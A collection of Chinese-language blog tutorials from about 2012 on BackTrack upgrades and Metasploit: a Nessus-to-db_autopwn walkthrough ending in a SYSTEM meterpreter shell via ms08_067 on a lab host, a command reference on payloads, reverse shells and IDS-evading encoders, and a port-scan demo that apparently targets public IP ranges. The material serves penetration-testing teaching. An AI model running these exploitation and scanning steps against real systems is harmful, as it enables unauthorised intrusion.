【系统】BackTrack R2快速升级R3

最近,刚刚发布了BT5 R3,但又不想重新安装系统。下面介绍一个很简单的方法,升级R2到R3。
首先,你要确保你的现有的系统已经更新到最新:
apt-get update && apt-get dist-upgrade升级完后,剩下的就是安装R3新增加的工具。
要注意的是,32位和64位的工具之间有细微的差别,所以一定要选择正确的工具包。
32-Bit Tools
apt-get install libcrafter blueranger dbd inundator intersect mercury cutycapt trixd00r artemisa rifiuti2 netgear-telnetenable jboss-autopwn deblaze sakis3g voiphoney apache-users phrasendrescher kautilya manglefizz rainbowcrack rainbowcrack-mt lynis-audit spooftooph wifihoney twofi truecrack uberharvest acccheck statsprocessor iphoneanalyzer jad javasnoop mitmproxy ewizard multimac netsniff-ng smbexec websploit dnmap johnny unix-privesc-check sslcaudit dhcpig intercepter-ng u3-pwn binwalk laudanum wifite tnscmd10g bluepot dotdotpwn subterfuge jigsaw urlcrazy creddump android-sdk apktool ded dex2jar droidbox smali termineter bbqsql htexploit smartphone-pentest-framework fern-wifi-cracker powersploit webhandler
64-Bit Tools:
apt-get install libcrafter blueranger dbd inundator intersect mercury cutycapt trixd00r rifiuti2 netgear-telnetenable jboss-autopwn deblaze sakis3g voiphoney apache-users phrasendrescher kautilya manglefizz rainbowcrack rainbowcrack-mt lynis-audit spooftooph wifihoney twofi truecrack acccheck statsprocessor iphoneanalyzer jad javasnoop mitmproxy ewizard multimac netsniff-ng smbexec websploit dnmap johnny unix-privesc-check sslcaudit dhcpig intercepter-ng u3-pwn binwalk laudanum wifite tnscmd10g bluepot dotdotpwn subterfuge jigsaw urlcrazy creddump android-sdk apktool ded dex2jar droidbox smali termineter multiforcer bbqsql htexploit smartphone-pentest-framework fern-wifi-cracker powersploit webhandler
OK!完成更新
经过本人的测试发现32位的更新里面安装的软件列表部分没有,现提供一个可以直接运行的软件列表。
apt-get install blueranger inundator intersect mercury netgear-telnetenable jboss-autopwn deblaze apache-users kautilya lynis-audit wifihoney twofi acccheck statsprocessor iphoneanalyzer jad javasnoop ewizard websploit dnmap  unix-privesc-check dhcpig intercepter-ng laudanum wifite tnscmd10g bluepot subterfuge jigsaw urlcrazy creddump android-sdk apktool ded termineter bbqsql htexploit smartphone-pentest-framework fern-wifi-cracker powersploit webhandler

 

kylin:正好我的bt5需要升级了,双系统,重装的话太麻烦,还是直接用这办法吧~~~

本文固定链接: http://www.kylins.org/302.html | kylin’s blog|关注网络安全与互联网动态

metasploit db_autopwn & load nessus

Author:bugcx or Anonymous
Url:http://blog.bug.cx/2012/04/16/metasploit-db_autopwn-load-nessus/ | bugcx’s blog | 关注网络安全

(撸一撸)
root@bt:~# msfconsole
  +——————————————————-+
  |  METASPLOIT by Rapid7                                 |
  +—————————+—————————+
  |      __________________   |                           |
  |  ==c(______(o(______(_()  | |””””””””””””|======[***  |
  |             )=\           | |  EXPLOIT   \            |
  |            // \\          | |_____________\_______    |
  |           //   \\         | |==[msf >]============\   |
  |          //     \\        | |______________________\  |
  |         // RECON \\       | \(@)(@)(@)(@)(@)(@)(@)/   |
  |        //         \\      |  *********************    |
  +—————————+—————————+
  |      o O o                |        \’\/\/\/’/         |
  |              o O          |         )======(          |
  |                 o         |       .’  LOOT  ‘.        |
  | |^^^^^^^^^^^^^^|l___      |      /    _||__   \       |
  | |    PAYLOAD     |””\___, |     /    (_||_     \      |
  | |________________|__|)__| |    |     __||_)     |     |
  | |(@)(@)”””**|(@)(@)**|(@) |    ”       ||       ”     |
  |  = = = = = = = = = = = =  |     ‘————–‘      |
  +—————————+—————————+
       =[ metasploit v4.3.0-dev [core:4.3 api:1.0]
+ — –=[ 831 exploits – 470 auxiliary – 143 post
+ — –=[ 250 payloads – 27 encoders – 8 nops
       =[ svn r15107 updated yesterday (2012.04.14)
msf > load nessus
[*] Nessus Bridge for Metasploit 1.1
[+] Type nessus_help for a command listing
[*] Successfully loaded plugin: nessus
msf > nessus_help
[*]
Command                    Help Text
——-                    ———
—————–          —————–
—————–          —————–
—————–          —————–
—————–          —————–
—————–          —————–
—————–          —————–
Generic Commands
Plugin Commands
Policy Commands
Reports Commands
Scan Commands
User Commands
nessus_admin               Checks if user is an admin
nessus_connect             Connect to a nessus server
nessus_find_targets        Try to find vulnerable targets from a report
nessus_help                Listing of available nessus commands
nessus_logout              Logout from the nessus server
nessus_plugin_details      List details of a particular plugin
nessus_plugin_family       List plugins in a family
nessus_plugin_list         Displays each plugin family and the number of plugins
nessus_policy_del          Delete a policy
nessus_policy_list         List all polciies
nessus_report_get          Import a report from the nessus server in Nessus v2 format
nessus_report_host_detail  Detail from a report item on a host
nessus_report_host_ports   Get list of open ports from a host from a report
nessus_report_hosts        Get list of hosts from a report
nessus_report_list         List all Nessus reports
nessus_save                Save nessus login info between sessions
nessus_scan_new            Create new Nessus Scan
nessus_scan_pause          Pause a Nessus Scan
nessus_scan_pause_all      Pause all Nessus Scans
nessus_scan_resume         Resume a Nessus Scan
nessus_scan_resume_all     Resume all Nessus Scans
nessus_scan_status         List all currently running Nessus scans
nessus_scan_stop           Stop a Nessus Scan
nessus_scan_stop_all       Stop all Nessus Scans
nessus_server_feed         Nessus Feed Type
nessus_server_prefs        Display Server Prefs
nessus_server_status       Check the status of your Nessus Server
nessus_user_add            Add a new Nessus User
nessus_user_del            Delete a Nessus User
nessus_user_list           Show Nessus Users
nessus_user_passwd         Change Nessus Users Password
[*]

连接上nessus

msf > nessus_connect fuckyou:123456@192.168.8.9 ok
[*] Connecting to https://192.168.8.9:8834/ as fuckyou
[*] Authenticated
msf >

nessus user添加一个nessus用户

msf > nessus_user_add
[*] Usage:
[*] nessus_user_add <username> <password>
[*] Only adds non admin users
msf > nessus_user_add xxxooo 123456
[+] xxxooo has been added

查看用户列表

msf > nessus_user_list
[+] There are 3 users
[+] Nessus users
[+]
Name     Is Admin?  Last Login
—-     ———  ———-
fuckyou  TRUE       14:26 Apr 16 2012
xxxooo   FALSE      08:00 Jan 01 1970
xxxxxx   TRUE       08:00 Jan 01 1970

我们发现 xxxooo不是admin 我们提升为admin

root@bt:/opt/nessus/sbin# ./nessus-admin
Login : xxxooo
xxxooo is NOT an administrative user. Do you want to grant him admin rights? [y/n] y
xxxooo is now an administrator
root@bt:/opt/nessus/sbin#

现在在来看看user

msf > nessus_user_list
[+] There are 3 users
[+] Nessus users
[+]
Name     Is Admin?  Last Login
—-     ———  ———-
fuckyou  TRUE       14:26 Apr 16 2012
xxxooo   TRUE       08:00 Jan 01 1970
xxxxxx   TRUE       08:00 Jan 01 1970
msf >

选择一种扫描规则

msf > nessus_policy_list
[+] Nessus Policy List
[+]
ID  Name                                         Comments
—  —-                                         ——–
-1  Prepare for PCI-DSS audits (section 11.2.2)
-2  Web App Tests
-3  External Network Scan
-4  Internal Network Scan
msf > nessus_scan_new
[*] Usage:
[*]        nessus_scan_new <policy id> <scan name> <targets>
[*]        use nessus_policy_list to list all available policies
msf > nessus_scan_new -2 fuck 192.168.8.5
[*] Creating scan from policy number -2, called “fuck” and scanning 192.168.8.5
[*] Scan started.  uid is a7d66781-fce6-e675-a9d8-d14fa44186c60ed9f72686359bfd

查看扫描状态

msf > nessus_scan_status
[+] Running Scans
[+]
Scan ID                                               Name  Owner    Started            Status   Current Hosts  Total Hosts
——-                                               —-  —–    ——-            ——   ————-  ———–
a7d66781-fce6-e675-a9d8-d14fa44186c60ed9f72686359bfd  fuck  fuckyou  05:40 Apr 16 2012  running  0              1
[+]
[*] You can:
[+]         Import Nessus report to database :  nessus_report_get <reportid>
[+]         Pause a nessus scan :           nessus_scan_pause <scanid>
msf >

查看扫描报告列表

msf > nessus_report_list
[+] Nessus Report List
[+]
ID                                                    Name  Status     Date
—                                                    —-  ——     —-
63801a95-dae6-677a-c0ae-24e23db0ef4bd95ca44becc57f34  xxxx  completed  05:37 Apr 16 2012
a7d66781-fce6-e675-a9d8-d14fa44186c60ed9f72686359bfd  fuck  running    06:04 Apr 16 2012
[*] You can:
[*]         Get a list of hosts from the report:          nessus_report_hosts <report id>
msf >

扫描完之后status会completed

msf > nessus_report_list
[+] Nessus Report List
[+]
ID                                                    Name  Status     Date
—                                                    —-  ——     —-
30d36481-b570-f399-dc5d-9b057274dc22aae62b3d816166db  fuck  completed  06:04 Apr 16 2012
63801a95-dae6-677a-c0ae-24e23db0ef4bd95ca44becc57f34  xxxx  completed  05:37 Apr 16 2012
[*] You can:
[*]         Get a list of hosts from the report:          nessus_report_hosts <report id>
msf >

查询指定扫描报告详细

msf > nessus_report_hosts 30d36481-b570-f399-dc5d-9b057274dc22aae62b3d816166db
[+] Report Info
[+]
Hostname     Severity  Sev 0  Sev 1  Sev 2  Sev 3  Current Progress  Total Progress
——–     ——–  —–  —–  —–  —–  —————-  ————–
192.168.8.1  19        8      19     0      0      48026             48026
192.168.8.2  25        8      24     1      0      48026             48026
192.168.8.3  29        8      28     1      0      48026             48026
192.168.8.4  25        6      24     1      0      48026             48026
192.168.8.5  66        13     56     4      6      48026             48026
192.168.8.6  20        6      19     1      0      48026             48026
192.168.8.7  387       13     84     49     254    48026             48026
192.168.8.8  64        5      47     8      9      48026             48026
[*] You can:
[*]         Get information from a particular host:          nessus_report_host_ports <hostname> <report id>
msf >

列出指定IP的扫描结果

msf > nessus_report_host_ports 192.168.8.7 30d36481-b570-f399-dc5d-9b057274dc22aae62b3d816166db
[+] Host Info
[+]
Port  Protocol  Severity  Service Name   Sev 0  Sev 1  Sev 2  Sev 3
—-  ——–  ——–  ————   —–  —–  —–  —–
0     icmp      1         general        0      2      0      0
0     tcp       1         general        0      21     0      0
0     udp       1         general        0      1      0      0
123   udp       1         ntp?           1      1      0      0
135   tcp       1         epmap          1      2      0      0
137   udp       1         netbios-ns     1      2      0      0
138   udp       1         netbios-dgm?   1      1      0      0
139   tcp       1         smb            1      2      0      0
445   udp       1         microsoft-ds?  1      1      0      0
445   tcp       3         cifs           1      26     42     253
500   udp       1         isakmp?        1      1      0      0
1025  tcp       1         dce-rpc        1      2      0      0
1041  tcp       1         dce-rpc        1      2      0      0
3389  tcp       3         msrdp          1      3      2      1
3790  tcp       2         www            1      16     5      0
4500  udp       1         ipsec-nat-t?   1      1      0      0
[*] You can:
[*]         Get detailed scan infromation about a specfic port: nessus_report_host_detail <hostname> <port> <protocol> <report id>
msf >

查看指定IP地址指定端口扫描详细

msf > nessus_report_host_detail 192.168.8.7 3389 tcp 30d36481-b570-f399-dc5d-9b057274dc22aae62b3d816166db
[+] Port Info
[+]
Port              Severity  PluginID  Plugin Name                                                                                                     CVSS2  Exploit?  CVE                Risk Factor  CVSS Vector
—-              ——–  ——–  ———–                                                                                                     —–  ——–  —                ———–  ———–
msrdp (3389/tcp)  1         34252     Microsoft Windows Remote Listeners Enumeration (WMI)                                                            none   .         []                 None         .
msrdp (3389/tcp)  1         10940     Windows Terminal Services Enabled                                                                               none   .         []                 None         .
msrdp (3389/tcp)  2         57690     Terminal Services Encryption Level is Medium or Low                                                             4.3    .         []                 Medium       CVSS2#AV:N/AC:M/Au:N/C:P/I:N/A:N
msrdp (3389/tcp)  1         30218     Terminal Services Encryption Level is not FIPS-140 Compliant                                                    2.6    .         []                 Low          CVSS2#AV:N/AC:H/Au:N/C:P/I:N/A:N
msrdp (3389/tcp)  2         18405     Microsoft Windows Remote Desktop Protocol Server Man-in-the-Middle Weakness                                     5.1    true      [“CVE-2005-1794”]  Medium       CVSS2#AV:N/AC:H/Au:N/C:P/I:P/A:P
msrdp (3389/tcp)  3         58435     MS12-020: Vulnerabilities in Remote Desktop Could Allow Remote Code Execution (2671387) (uncredentialed check)  9.3    true      [“CVE-2012-0002”]  High         CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C
msf >

导入一个扫描报告

msf > nessus_report_get
[*] Usage:
[*]        nessus_report_get <report id>
[*]        use nessus_report_list to list all available reports for importing
msf > nessus_report_get 30d36481-b570-f399-dc5d-9b057274dc22aae62b3d816166db
[*] importing 30d36481-b570-f399-dc5d-9b057274dc22aae62b3d816166db
[*] 192.168.8.9
[*] 192.168.8.8
[*] 192.168.8.7
[*] 192.168.8.6
[*] 192.168.8.5
[*] 192.168.8.4
[*] 192.168.8.3
[*] 192.168.8.2
[*] 192.168.8.1
[+] Done
msf >

查看扫描结果hosts

msf > hosts -c address,os_name,os_flavor,os_sp,vulns
Hosts
=====
address       os_name                   os_flavor  os_sp  vulns
——-       ——-                   ———  —–  —–
10.0.2.15     Microsoft Windows         XP         SP3    0
192.168.8.1   Linux                                       17
192.168.8.2   Microsoft Windows         7                 17
192.168.8.3   Microsoft Windows         2003       SP2    21
192.168.8.4   Microsoft Windows         7                 17
192.168.8.5   Microsoft Windows         2003       SP2    289
192.168.8.6   Microsoft Windows         XP                20
192.168.8.7   Microsoft Windows         2003       SP2    369
192.168.8.8   Linux  3.2.6 on Ubuntu 1                    48

查看扫描到的主机漏洞

msf > vulns
[*] Time: 2012-04-16 06:14:35 UTC Vuln: host=192.168.8.7 name=DCE Services Enumeration refs=NSS-10736
[*] Time: 2012-04-16 06:16:46 UTC Vuln: host=192.168.8.7 name=Traceroute Information refs=NSS-10287
[*] Time: 2012-04-16 06:16:46 UTC Vuln: host=192.168.8.7 name=Nessus Scan Information refs=NSS-19506
[*] Time: 2012-04-16 06:16:46 UTC Vuln: host=192.168.8.7 name=Microsoft Windows Summary of Missing Patches refs=NSS-38153
[*] Time: 2012-04-16 06:16:46 UTC Vuln: host=192.168.8.7 name=Common Platform Enumeration (CPE) refs=NSS-45590
[*] Time: 2012-04-16 06:16:46 UTC Vuln: host=192.168.8.7 name=Microsoft Office Detection refs=NSS-27524
[*] Time: 2012-04-16 06:16:47 UTC Vuln: host=192.168.8.7 name=Device Type refs=NSS-54615
[*] Time: 2012-04-16 06:16:47 UTC Vuln: host=192.168.8.7 name=OS Identification refs=NSS-11936
[*] Time: 2012-04-16 06:16:47 UTC Vuln: host=192.168.8.7 name=Microsoft Windows – Local Users Information : Disabled accounts refs=OSVDB-752,NSS-10913
[*] Time: 2012-04-16 06:16:47 UTC Vuln: host=192.168.8.7 name=Microsoft Windows – Local Users Information : Passwords never expire refs=OSVDB-755,NSS-10916
[*] Time: 2012-04-16 06:16:47 UTC Vuln: host=192.168.8.7 name=Microsoft Windows – Local Users Information : User has never logged on refs=OSVDB-754,NSS-10915

…….略

我们也可以是用auto_exploit进行批量溢出
开启postgresql 创建一个数据库

root@bt:/opt/nessus/sbin# /etc/init.d/postgresql-8.4 start
 * Starting PostgreSQL 8.4 database server
root@bt:~# psql -U postgres -h localhost
用户 postgres 的口令:
psql (8.4.10)
SSL连接 (加密:DHE-RSA-AES256-SHA,位元:256)
输入 “help” 来获取帮助信息.
postgres=# CREATE DATABASE fuck;
CREATE DATABASE
postgres=#

msf连接postgresql

msf > db_status
[*] postgresql connected to msf3dev
msf > db_connect postgres:123456@localhost:5432/fuck

查看nessus报告 并导入一个报告

msf > nessus_report_list
[+] Nessus Report List
[+]
ID                                                    Name  Status     Date
—                                                    —-  ——     —-
30d36481-b570-f399-dc5d-9b057274dc22aae62b3d816166db  fuck  completed  06:04 Apr 16 2012
63801a95-dae6-677a-c0ae-24e23db0ef4bd95ca44becc57f34  xxxx  completed  05:37 Apr 16 2012
[*] You can:
[*]         Get a list of hosts from the report:          nessus_report_hosts <report id>
msf > nessus_report_get 30d36481-b570-f399-dc5d-9b057274dc22aae62b3d816166db
[*] importing 30d36481-b570-f399-dc5d-9b057274dc22aae62b3d816166db
[*] 192.168.8.8
[*] 192.168.8.7
[*] 192.168.8.6
[*] 192.168.8.5
[*] 192.168.8.4
[*] 192.168.8.3
[*] 192.168.8.2
[*] 192.168.8.1
[+] Done
msf >

加载auto_exploit,执行vuln_exploit溢出

msf > load auto_exploit
[*] auto_exploit plug-in loaded.
[*] Successfully loaded plugin: auto_exploit
msf > vuln_exploit -h
OPTIONS:
    -f <opt>  Provide a comma separated list of IP’s and Ranges to skip when running exploits.
    -h        Command Help
    -j <opt>  Max number of concurrent jobs, 3 is the default.
    -m        Only show matched exploits.
    -r <opt>  Minimum Rank for exploits (low, average,normal,good,great and excellent) good is the default.
    -s        Do not limit number of sessions to one per target.
msf > vuln_exploit ruby问题略

或者用db_autopwn好点

msf > load db_autopwn
msf > db_autopwn -t -e -p
………….略
[*] (535/535 [1 sessions]): Waiting on 10 launched modules to finish execution…
[*] (535/535 [1 sessions]): Waiting on 5 launched modules to finish execution…
[*] (535/535 [1 sessions]): Waiting on 0 launched modules to finish execution…
[*] The autopwn command has completed with 1 sessions
[*] Enter sessions -i [ID] to interact with a given session ID
[*]
[*] ================================================================================
Active sessions
===============
  Id  Type                   Information                            Connection                                            Via
  —  —-                   ———–                            ———-                                            —
  1   meterpreter x86/win32  NT AUTHORITY\SYSTEM @ SB-43E30C43F14F  192.168.8.9:42218 -> 192.168.8.5:32698 (192.168.8.5)  exploit/windows/smb/ms08_067_netapi
[*] ================================================================================
msf > sessions -l
Active sessions
===============
  Id  Type                   Information                            Connection
  —  —-                   ———–                            ———-
  1   meterpreter x86/win32  NT AUTHORITY\SYSTEM @ SB-43E30C43F14F  192.168.8.9:42218 -> 192.168.8.5:32698 (192.168.8.5)
msf > sessions -i 1
[*] Starting interaction with 1…
meterpreter > ipconfig
Interface  1
============
Name         : MS TCP Loopback interface
Hardware MAC : 00:00:00:00:00:00
MTU          : 1520
IPv4 Address : 127.0.0.1
IPv4 Netmask : 255.0.0.0
Interface 65539
============
Name         : AMD PCNET Family PCI Ethernet Adapter
Hardware MAC : 08:00:27:0d:dd:65
MTU          : 1500
IPv4 Address : 192.168.8.5
IPv4 Netmask : 255.255.255.0
meterpreter > background
[*] Backgrounding session 1…

auto_exploit.rb:auto_exploit

Metasploit Framework 漫谈 — 各种谈

1.目录结构

metasploit framework
进入update
输入:svn update 进行文件更新

3.MSF目录结构:
data :包含meterpreter,PassiveX,VNC DLLs,还有一些用户接口的代码如msfweb,和一些插件用到的数据文件

documentiation:包含msf的文档,ruby脚本样例和msf利用的API

external:包含meterpreter,vnc和passiveX payloads的源码

lib:包含msf使用的ruby库

modules:包含exploits,playloads,nops,encoders和auxiliary模块

plugins:包含数据库连接插件,IPS过滤代码和其他一些插件代码

scripts:包含meterpreter的课通过rubyshell利用的脚本,目前包含杀死目标系统antivirus和把meterperter server 实例移动到其他进程的脚本

.svn:包含subversion客户端连接到cvs服务器使用的文件和数据

tools:包含一些有用的脚本和零散工具

2.核心命令

msfconsole core commands
msfconsole
多个会话可以并发执行,命令能够进行交互会话,比如session,jobs
也可以列出和杀死运行中的任务,也可以从一个单一利用创建多个会话
这意味着单个利用发动一个用户指定的主机列表
会话可以通过ctrl+z发送到后台,ctrl+c停止,
msf带有一组强大的API,他们可以通过msfconsole访问
切换到交互式ruby shell,session和Framework使底层交互成为可能

核心命令:
? 帮助菜单
back 从当前环境返回
banner 显示一个MSF banner
cd 切换目录
color 颜色切换
connect 连接一个主机
exit 退出MSF
help 帮助菜单
info 显示一个或多个模块的信息
irb 进入irb脚本模式
jobs 显示和管理作业
kill 杀死一个作业
load 加载一个插件
loadpath 在一个路径搜索并加载模块
quit 退出MSF
resource 运行存储在一个文件中的命令
route 查看一个会话的路由信息
save 保存动作
search 搜索模块名和描述
set 给一个变量赋值
setg 把一个值赋给全局变量
show 显示所给类型的模块,或所有模块
sleep 在限定的秒数内什么也不做
unload 卸载一个模块
unset 解除一个或多个变量
unsetg 解除一个或多个全局变量
use 通过名称选择一个模块
version 显示msf和控制台库版本号

3.Metasploit 功能模块

metasploit 功能模块||MSF主要命令||数据库命令

————————————————-
exploits:

简单来讲,就是针对不同的已知漏洞的利用程序
当我们执行show exploits命令后,显示3行,分别为
exploits名称 等级(rank) 描述
exploit命名规则:
操作系统/服务/模块名称
例如:windows/vnc/realvnc_client
等级(rank)代表好用程度
描述就是对漏洞的简介
查看exploit星系信息:info 模块名

选择一个exploit:use exploits/windows/vnc/real_vnc_client
列出exploit设置选项:show options
options中required的是必须设定的选项
列出exploit的课攻击目标类型:show targets
设置选项:set option 值(如 set RHOST 192.168.0.1)
设置攻击目标:set TARGET 编号(如set Target 2)
————————————————-
payloads module

payload也就是shellcode,就是在漏洞利用成功后所要做的事情,在MSF中为我们提供了大量的使用的payloads。
当我们选择了一个exploit模块并设置完选项后,我们可以用show payloads 来看一下当前exploit 可以用哪个payloads。
payloads命名规则:
操作系统/类型/名称 如:windows/shell/bind_tcp
类型主要有:
shell:得到一个shell
Dllinject:上传DLL注入到进程
patchup***:修补漏洞
upexec:上传并执行一个文件
meterpreter:高级payload
vncinject:高级payload
passiveX:高级payload
payload名称命名规则:
–shell_find_tag:在一个已建立的连接上创建一个shell
–shell_reverse_tcp:反向连接到攻击者主机并创建一个shell
–bind_tcp:监听一个tcp连接
–reverse_tcp:反向建立tcp连接
–reverse_http:通过HTTP隧道通信并创建一个新用户添加到管理组
–add_user:创建一个新用户并添加到管理组
–xxx_ipv6_tcp:基于IPV6
–XXX_nonx_tcp:非No eXecute 或win7(NX是应用在CPU的一种可以防止缓冲区溢出的技术)
–xxx_ord_tcp:有序payload
–xxx_tcp_allports:在所有可能的端口
–详细解释参考 http://www.offensice-security.com/metasploit-unleashed/A-Bit-About-Payloads
设置payload:set PAYLOAD payload_name
列出选项还是:show options
之后设置选项:set RHOST 192.168.0.1
这样exploit 和 payload就设置完毕了,我们就可以对目标主机进行利用了
由于payloads只不过是汇编指令的序列,通常nop在它前面
这可能作为特征用来开发检测这些攻击,因此,payloads需要被编译并且变化nop用于躲避IDS或IPS检测。
MSF提供了一些编码器以及若干NOP生成器
来使检测过程变得极其困难。
————————————————-

攻击实例的演示:

attacking by MSF
演示一个简单的例子
远程溢出windows服务器
ms08067 实例的讲解

CTRL+Z 放入后台执行
sessions
显示后台的信息
sessions -h
sessions -i 1 //重新进入连接CRTRL
CTRL+C 断开连接

—————————-
执行过程:
1.连接到远程系统的漏洞端口
2.交换协议序列直到到达漏洞触发点
3.注入利用代码,其中包含了直接或间接的修改返回地址为我们payload的指令以及nop指令
这增加了我们的代码被执行的机会
4.后续利用,可以是在被创建的用户连接到远程系统或可能是一个GUI客户端到远程系统
————————————————-
auxiliary,encoders,nops 三个模块

nops 很多时候,跳转到shellcode的精确位置可能不知道,nops需要预置到实际的利用上来避免触发IDS
encoders 作用类似nops,payloads也能触发IDS。他们可以通过payload编码来避免在网络上被发现,在目标上解码,按计划执行。
auxiliary:指纹扫描,漏洞扫描,暴力破解,SQL注入,DoS,欺骗,嗅探,漏洞挖掘等等使用辅助工具的集合模块
————————————————-
Msfcli interface
msfcli接口允许用户从命令行直接执行利用,而不需要先启动msfconsole这适合迅速发动攻击,直接指定命令行参数,这在大量的系统需要进行测试同样的漏洞的时候非常有用。
也可以写一个简单的shell脚本,指定一IP范围,依次运行利用的程序,对每个目标系统尝试攻击。
msfcli -h 查看帮助
S:显示模块信息
P:可用payloads
O:选项
T:可用目标
E:执行利用
——–
一个简单的例子:
1.显示选择的利用模块信息
./msfcli<exploit_name> S
2.显示可用payload:
./msfcli <exploit_name> P
3.为exploit选择payload,并显示需要设置的选项
./msfcli <exp> PAYLOAD=<payload> O
4.设置必须的选项,列出可用目标:
./msfcli <exp> payload=<payload> option=value T
5.设置目标并执行利用
./msfcli <exp> payload=<payload> option=value target=number E
——————————
msfweb 用户接口提供人性化的web界面,便于使用模块:
exploits:利用模块,提供模块搜索功能
auxiliarys:辅助程序模块,提供搜索功能
Payloads:payloads模块,提供搜索功能
console:基于web的控制台,相当于msfconsole
sessions:会话模块,当前的会话信息
options:风格设定
about:msfweb的版本信息
————————————————-
msfd interface
msfd 工具打开一个网络接口道msfconsole,它可以被指定的IP地址执行,并且监听端口等待进入的连接,允许一个或多个用户从远程系统连接进msf。
实例:
本机: msfd -a 192.168.1.14 -p 2323
远程主机: nc 192.168.1.14 2323
本机断开链接
taskkill /pid <进程号> /f 【强制关闭】
注意设置的时候是IP地址设为本机的IP地址,其他IP地址不行。
————————————————-
msfpayload and msfencode

msfpayload:该工具使用户可以在命令行修改现有的payload,并获得C perl 或 Raw 的输出,-h参数列出我们可以用的选项,S选项为我们显示具体payload的信息,选定一个特定payload后,我们就可以用msfpayload对其修改了,并且用C 选项,会输出C程序的格式,P选项输出Perl脚本的格式,也可以输出Raw格式,这使得它能被传输到另一个程序,比如msfencode或重定向到一个文件,我们需要为payload设置CMD参数用于创建在成功利用后所要执行的特定命令,以设置一个dir命令,并输出perl脚本为例,./msfpayload windows/exec CMD=dir P

msfenclode:使用程序是一个可以直接访问payload编码器的框架,可以用-l参数列出可用编码器,-h参数列出可选项,用msfpayload是生成raw格式payload的一个简单方法,并可以通过管道输出直接msfencode或从文件中读取它,编码确保不良字符不会出现在payload,最终也改进了躲避IDS能力。
bad characters:不良字符
许多应用程序在接受输入时执行过滤排序,如:web server 可能在unicode编码发动到一段存在漏洞的代码之前对其进行预处理,因此payload可能会被修改,并且无法正常运行。
一些字符也最终成为结束字符串,比如NULL字节(0x00)他们必须也要避免,要确定哪些字符会被预处理,然后进行修改。
———————-
database backend comands //数据库后台命令
msf可以支持多种不同的数据库,当前包括SQLite3(自带驱动),MySQL,PostgreSQL用于探测攻击目标的漏洞和自动利用,并且支持加载amap ,nmap或Nessus扫描报告后,根据目标系统开发端口和可能存在的漏洞进行自动尝试利用,这大大提高了渗透测试人员的工作效率。
数据库后台的命令:
db_add_host 添加一个或多个主机到数据库
db_add_note 添加一个注释到主机
db_add_port 添加一个端口到主机
db_connect 连接一个存在数据库实例
db_create 创建一个新的数据库实例
db_del_host 从数据库删除一个或多个主机
db_del_port 从数据库删除一个端口
db_destory 删除一个存在的数据库
db_disconnect 断开与当前数据库实例的连接
db_driver 指定一个数据库驱动
db_hosts 列出数据库中的所有主机
db_nmap 执行Nmap并记录输出
db_notes 列出数据中的所有注释
db_services 列出数据库中的所有服务
db_vuns 列出数据库中的所有漏洞
db_workspaces 转换数据库工作区
db_import_ip_list 引入一个IP列表文件
db_import_amap_mlog 引入一个THC-Amap扫描结果文件(-o,-m)
db_import_nessus_nbe 引入一个Nessus扫描结果文件(NBE)
db_import_nessus_xml 引入一个Nessus扫描结果文件
db_import_nmap_xml 引入一个Nmap扫描结果文件(-oX)
db_autopwn 自动利用

4.db_autopwn
db_autopwn
参数:
-h 显示帮助
-t 显示多有匹配的利用模块
-x 选择基于漏洞的模块
-p 选择基于开放端口的模块
-e 选择所有匹配目标的利用程序
-r 用一个反向连接的shell(reverse)
-b 用以随机端口的绑定shell(bind)
-q 禁用利用程序输出
-l [范围]值对此范围内的主机进行利用
-X [范围]永远排除此范围内的主机
-Pl [范围]只对开放这些端口的主机进行利用
-PX [范围]永远排除对开放这些端口的主机
-m [范围]只运行名字与正则表达式匹配的模块
————————————-
成功实例:
db_nmap -sV 192.168.1.110 —扫描主机
db_autopwn -p -e -b —– 自动连接||进行攻击

BY Hlly_M风迷搜集
qing.weibo.com/hllym

metasploit中scanner的使用抛砖|portscanner && scanner/smb/smb_version 的使用

端口扫描工具:

[bash]

msf > search portscan

Matching Modules
================

Name Disclosure Date Rank Description
—- ————— —- ———–
auxiliary/scanner/natpmp/natpmp_portscan normal NAT-PMP External Port Scanner
auxiliary/scanner/portscan/ack normal TCP ACK Firewall Scanner
auxiliary/scanner/portscan/ftpbounce normal FTP Bounce Port Scanner
auxiliary/scanner/portscan/syn normal TCP SYN Port Scanner
auxiliary/scanner/portscan/tcp normal TCP Port Scanner
auxiliary/scanner/portscan/xmas normal TCP "XMas" Port Scanner
msf >

[/bash]

上述各种端口扫描工具使用方法大同小异,只是扫描的类型 和 目的各不相同. 要灵活使用.

以其中的一种为例子:

[bash]

msf > use auxiliary/scanner/portscan/ftpbounce
msf auxiliary(ftpbounce) > show options

Module options (auxiliary/scanner/portscan/ftpbounce):

Name Current Setting Required Description
—- ————— ——– ———–
BOUNCEHOST yes FTP relay host
BOUNCEPORT 21 yes FTP relay port
FTPPASS mozilla@example.com no The password for the specified username
FTPUSER anonymous no The username to authenticate as
PORTS 1-10000 yes Ports to scan (e.g. 22-25,80,110-900)
RHOSTS yes The target address range or CIDR identifier
THREADS 1 yes The number of concurrent threads

msf auxiliary(ftpbounce) > set RHOSTS 108.171.217.91/24
RHOSTS => 108.171.217.91/24
msf auxiliary(ftpbounce) > set THREADS 600
THREADS => 600
msf auxiliary(ftpbounce) > run
[-] Auxiliary failed: Msf::OptionValidateError The following options failed to validate: BOUNCEHOST.
msf auxiliary(ftpbounce) > set BOUNCEHOST 110.120.119.54
BOUNCEHOST => 110.120.119.54
msf auxiliary(ftpbounce) > run

[*] Scanned 107 of 256 hosts (041% complete)
[*] Scanned 241 of 256 hosts (094% complete)
[*] Scanned 255 of 256 hosts (099% complete)
[*] Scanned 256 of 256 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(ftpbounce) >

[/bash]

portscan的其他的工具使用方法类似.

扫描目标主机的操作系统类型:

smb:  server message block

[bash]

msf auxiliary(ftpbounce) > back
msf > search scanner/smb

Matching Modules
================

Name Disclosure Date Rank Description
—- ————— —- ———–
auxiliary/scanner/smb/pipe_auditor normal SMB Session Pipe Auditor
auxiliary/scanner/smb/pipe_dcerpc_auditor normal SMB Session Pipe DCERPC Auditor
auxiliary/scanner/smb/smb2 normal SMB 2.0 Protocol Detection
auxiliary/scanner/smb/smb_enumshares normal SMB Share Enumeration
auxiliary/scanner/smb/smb_enumusers normal SMB User Enumeration (SAM EnumUsers)
auxiliary/scanner/smb/smb_enumusers_domain normal SMB Domain User Enumeration
auxiliary/scanner/smb/smb_login normal SMB Login Check Scanner
auxiliary/scanner/smb/smb_lookupsid normal SMB Local User Enumeration (LookupSid)
auxiliary/scanner/smb/smb_version normal SMB Version Detection
msf >

[/bash]

